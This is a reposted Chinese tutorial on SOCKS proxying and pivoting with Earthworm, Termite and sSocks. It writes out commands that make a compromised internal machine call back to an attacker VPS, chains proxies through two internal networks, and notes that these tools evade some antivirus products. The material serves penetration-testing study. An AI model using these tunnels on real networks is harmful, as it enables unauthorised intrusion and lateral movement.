17.socks代理(概述、ew和Termite、ssocks)


一、socks代理概述

 

 

1、代理的使用情況:

某些特殊區域的機器不能直接被外網的機器或者是某台機器訪問,那么我們就需要把那些機器作為一個代理服務器,建立代理服務,我們就可以通過這個代理服務去訪問特殊區域的機器了。

至於為什么不直接登錄到那台機器上操作,一因為容易被發現,二是工具不好傳上去。不使用端口轉發的原因是,端口轉發只能轉發一個端口,當我們想要同時訪問多個端口時,就需要建立多個轉發,這樣一來進程就很多了,而且訪問不同的端口還要考驗我們的記憶力,極其不便。

 

2、代理的兩種方式:

代理分為正向代理和反向代理,不同的代理適用於不同的場景

 

 

 

 

 

3、正向代理:

正向代理就是在已控制的機器上面開一個端口,用來建立代理服務,然后我們直接去連接使用開放出來的端口。

 

4、正向代理的工具:

①  Windows

Ⅰ  Earthworm,簡稱ew

Ⅱ  Xsocks

②  Linux

Ⅰ  Proxy_s5    raw.githubusercontent.com

Ⅱ  Xsocks

 

5、反向代理

反向代理就是我們控制的機器在內網或者是開了防火牆,導致我們不能直接連進去,只能讓受控機器先主動跟我們的VPS建立連接,然后我們再通過VPS與之通信加利利代理服務。

 

6、反向代理的工具:

①  Windows:

Ⅰ  Earthworm,簡稱ew

Ⅱ  Termite,ew升級版

Ⅲ  Cobalt Strike

Ⅳ  Metasploit

Ⅴ  sSocks【Windows版】

Ⅵ  ……

 

②  Linux:

Ⅰ  Earthworm,簡稱ew

Ⅱ  Termite,ew升級版

Ⅲ  sSocks  https://github.com/tostercx/ssocks

Ⅳ  Metasploit

Ⅴ  ……

 

③  Web:

Ⅰ  reGeorg

Ⅱ  ……

 

 

二、ew和Termite的使用

 

 

1、ew和Termite:

優點在於功能強大,但缺點也都一樣,被殺,由於有着強大的功能,被業內各類安全人員使用,就免不了被殺的命運,而且作者都不願意更新並移除了下載項,也不願意開放源代碼。

Ew:http://rootkiter.com/EarthWorm/

Termite:http://rootkiter.com/Termite/

 

2、二重內網環境中的ew代理利用:

 

VPS(192.168.100.50):

ew_for_win_32.exe -s lcx_listen -l 1080 -e 8888    //監聽vps的8888端口,並將監聽到的內容轉到1080端口

FTP(192.168.1.4):

ew_for_win_32.exe -s ssocksd -l 9999    //FTP上開啟9999端口

WEB(192.168.1.128):

ew_for_win_32.exe -s lcx_slane -d 192.168.100.50 -e 8888 -f 192.168.1.4 -g 9999    //將FTP上剛剛開啟的9999端口轉到VPS的8888端口

 

接下來我們回到Hacker本機,用proxifier連接到VPS的1080端口即可。

 

3、二重內網環境中的ew代理的操作過程:

 

Vps:

 

 

 

Web:

 

 

 

ftp:

 

 

 

Proxifier:

 

 

 

接下來可以在上圖的“配置文件”中選擇“代理規則”進行配置,代理規則其實就相當於指定那個軟件的流量經過代理,哪些不經過代理,一般情況下我們需要使用瀏覽器訪問內網的網頁,所以就需要給瀏覽器配置經過代理,其他不需要代理的軟件就這設為direct模式(不經過代理)完成后即可實現代理服務

 

這里我們在開啟代理服務后,直接在vps上ping百度

 

 

 

然后我們在proxifier和ftp上能看到我們的操作,這里也說明我們成功的通過ew直接操控ftp了

 

 

 

 

 

 

4、關於Termite:

    Termite由於作者目前關閉下載渠道,因此這里就不演示了,看了下跟ew操作差不多

 

 

三、ssocks代理工具使用【正反代理】

 

 

1、ssocks代理工具的使用【正反向代理】:

該工具能夠免殺一些殺軟,項目地址:https://github.com/tostercx/ssocks

    下好之后里面有五個文件,一般我們用rcsoks.exe、rssocks.exe、ssocksd.exe,可以去控制台用-h參數查看使用方法。

 

2、ssocks的反向代理:

 

 

 

  實現需求:Hacker-win能夠通過代理訪問目標內網區域的機器

  環境分析:由於已控制的機器在目標內網,因此只能反向代理出來

 

  操作:

  ① VPS先執行:

  Rcsocks.exe -l 8080 -p 1080 -b

  

  ② 已控制的機器在執行:

  Rssocks.exe -s 2.2.2.3:8080 -b

  

  ③ 報錯

  憋慌,報錯是正常操作,還是可以正常使用的,很多人因為看到報錯就棄用了,這也算是免殺的一個原因~

 

3、ssocks的正向代理:

  正向代理就是直接啟動一個端口開啟一個socks服務:

  Ssocksd.exe --port 5555 -n 127.0.0.1

 

  注意,只能使用本地環回地址連接,雖然本機IP地址是:192.168.2.7,但如果想要所有的網卡都能監聽5555端口,就改成:

  Ssocksd.exe --port 5555 -b 0.0.0.0

  或者:

  Ssocksd.exe --port 5555

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM